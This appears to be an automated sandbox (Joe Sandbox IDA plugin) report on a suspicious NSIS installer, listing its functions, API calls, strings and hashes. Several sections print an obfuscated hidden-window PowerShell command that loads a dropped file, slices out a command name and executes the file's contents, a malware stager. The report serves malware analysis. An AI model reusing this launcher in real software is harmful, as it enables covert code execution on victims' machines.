String ID: Profiling Setup
API String ID: 3282139019-34039551
Opcode ID: e551cda9a3bf437e544b283e473c0f8b7dcf03e8c3845f4d2f125511825ec522
Instruction ID: 9d8e585b2be547e11c17cdc3c7f689375e8eb6d0c46788926a5446a1ddc0af4a
Opcode Fuzzy Hash: e551cda9a3bf437e544b283e473c0f8b7dcf03e8c3845f4d2f125511825ec522
Instruction Fuzzy Hash: E4C1AF71904200ABEB216F61ED49E2B3EBCEB46746F04453EF641B11F1C73DA9429B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403603 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EA5: GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
Part of subcall function 00405EA5: LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
Part of subcall function 00405EA5: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3

lstrcatA.KERNEL32(1033,0079E4F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E4F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3410,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000000), ref: 0040367E
lstrlenA.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited,1033,0079E4F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E4F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004036F3
lstrcmpiA.KERNEL32(?,.exe), ref: 00403706
GetFileAttributesA.KERNEL32(Exec), ref: 00403711
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited), ref: 0040375A

Part of subcall function 00405AD8: wsprintfA.USER32 ref: 00405AE5

RegisterClassA.USER32(007A16A0), ref: 00403797
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037AF
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037E4
ShowWindow.USER32(00000005,00000000), ref: 0040381A
LoadLibraryA.KERNELBASE(RichEd20), ref: 0040382B
LoadLibraryA.KERNEL32(RichEd32), ref: 00403836
GetClassInfoA.USER32(00000000,RichEdit20A,007A16A0), ref: 00403846
GetClassInfoA.USER32(00000000,RichEdit,007A16A0), ref: 00403853
RegisterClassA.USER32(007A16A0), ref: 0040385C
DialogBoxParamA.USER32(?,00000000,00403995,00000000), ref: 0040387B

Strings

RichEdit, xrefs: 0040384D
.exe, xrefs: 00403700
"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 00403607
RichEd20, xrefs: 00403826
_Nb, xrefs: 00403776, 004037DE
1033, xrefs: 00403623, 00403679
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited, xrefs: 0040368D, 00403695, 0040372D, 00403733, 00403743
RichEdit20A, xrefs: 0040383E, 00403844
RichEd32, xrefs: 00403831
C:\Users\user\AppData\Local\Temp\, xrefs: 0040360F
.DEFAULT\Control Panel\International, xrefs: 00403669
Exec, xrefs: 004036C1, 004036C9, 004036D6, 00403720, 00403726
Control Panel\Desktop\ResourceLocale, xrefs: 00403637

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-3415841326
Opcode ID: 466d8c25be6032520fae9a6c57d10c68e4166b79624d35f700c5268366167497
Instruction ID: 4586539b311a540a7331b1428def64a498e1fe17218f43e7d0271d3a33dfe7cf
Opcode Fuzzy Hash: 466d8c25be6032520fae9a6c57d10c68e4166b79624d35f700c5268366167497
Instruction Fuzzy Hash: 6561F5B49442407EE320AF619C85F2B3EACE786746F44857EF545B22E1CB7D69018A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C2B Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C3C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hnTW5HdWvY.exe,00000400), ref: 00402C58

Part of subcall function 0040580B: GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 0040580F
Part of subcall function 0040580B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831

GetFileSize.KERNEL32(00000000,00000000,007A9000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hnTW5HdWvY.exe,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 00402CA4

Strings

Inst, xrefs: 00402D10
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C35
"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 00402C2B
Error launching installer, xrefs: 00402C7B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E03
C:\Users\user\Desktop, xrefs: 00402C86, 00402C8B, 00402C91
Null, xrefs: 00402D22
soft, xrefs: 00402D19
C:\Users\user\Desktop\hnTW5HdWvY.exe, xrefs: 00402C42, 00402C51, 00402C65, 00402C85

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\hnTW5HdWvY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-2507468497
Opcode ID: fd7a13382d7d0fbd8bf23db57088f8f546a6f222ad9c5de8cc178bffd293609c
Instruction ID: f4f743896e3c3c29250869f87ba77b7665a96188decf60a66d8326f59fe02ce9
Opcode Fuzzy Hash: fd7a13382d7d0fbd8bf23db57088f8f546a6f222ad9c5de8cc178bffd293609c
Instruction Fuzzy Hash: 3C51D271941204AFDB109F65DE89B9E7BA8EF41354F10413BFA00B62D1D7BC9D818BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Profiling Setup,NSIS Error), ref: 00405B87

Part of subcall function 00404E65: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
Part of subcall function 00404E65: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
Part of subcall function 00404E65: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21

Strings

C:\Users\user\AppData\Local\Temp\nst19C6.tmp, xrefs: 00401789, 004017F8, 00401816
C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll, xrefs: 0040180C, 00401828
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 0040176C
Exec, xrefs: 0040175B, 00401764, 00401771, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 004017F3, 004017FF, 00401817

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"$C:\Users\user\AppData\Local\Temp\nst19C6.tmp$C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs$Exec
API String ID: 1941528284-789381947
Opcode ID: dcff8963308b2ca873f2611bd9013b816575dd23bb652e899ea40ceb27a2e8de
Instruction ID: a6908968e7e0a660026174725ff56955a6f1faca608fb57c98e9df4a9bbbb5a6
Opcode Fuzzy Hash: dcff8963308b2ca873f2611bd9013b816575dd23bb652e899ea40ceb27a2e8de
Instruction Fuzzy Hash: 5841D771904618BADB107BB5CC45DAF3A79EF42369F20833BF422B10E2C73C5A419A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404E65 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21

Strings

Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll, xrefs: 00404E85, 00404E97, 00404E9D, 00404EC0, 00404ECC

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll
API String ID: 2531174081-1391575251
Opcode ID: 1c6b95d35bddc95a7bbbacbe35564e314d7e1815686e0499ce86ad3b70f4f988
Instruction ID: f74adcbe277517a17f303532725ec1791e789a00cb50e63f9a7244524c8ab7df
Opcode Fuzzy Hash: 1c6b95d35bddc95a7bbbacbe35564e314d7e1815686e0499ce86ad3b70f4f988
Instruction Fuzzy Hash: A3219DB1900118BEDB119FA5DD849DFBFB9EF45354F14807AF504B6291C6389E40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402E64 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EC6
GetTickCount.KERNEL32 ref: 00402F4D
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7A
wsprintfA.USER32 ref: 00402F8A
WriteFile.KERNELBASE(00000000,00000000,0078EAA8,7FFFFFFF,00000000), ref: 00402FB8

Strings

... %d%%, xrefs: 00402F84

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: 1ee8cdaf81abc5902e0f14ca360aedf438fec03b597b3cc6de573ba64b3f625c
Instruction ID: a1131f75f2d1942715029d12413e0120ad3f5e0bd8d3acfe7200d6871225b0cc
Opcode Fuzzy Hash: 1ee8cdaf81abc5902e0f14ca360aedf438fec03b597b3cc6de573ba64b3f625c
Instruction Fuzzy Hash: F4515A7190121AABCF10DF69DA48A9F7BB8BB04355F14413BF900B72C4C7789E50DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93

Part of subcall function 00404E65: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
Part of subcall function 00404E65: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
Part of subcall function 00404E65: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Strings

"powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", xrefs: 00401FE7

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"
API String ID: 2987980305-3829023132
Opcode ID: 85308c4b588610a741ad742dead5d4bb3afdbee764a34200805a1c83be28a38f
Instruction ID: 69b9336aaa8ae6558f820ae1f090152185eb0d0d08fc7590899cf316edf80682
Opcode Fuzzy Hash: 85308c4b588610a741ad742dead5d4bb3afdbee764a34200805a1c83be28a38f
Instruction Fuzzy Hash: 7021EB72904215ABDF107FA4CE4DA6E79B0AB44358F24423BF611B62D0D7BC4942EA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040231E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040235C
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040237C
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023B5
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492

Strings

C:\Users\user\AppData\Local\Temp\nst19C6.tmp, xrefs: 0040236D, 0040237B, 0040238F, 0040239F, 004023AA

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
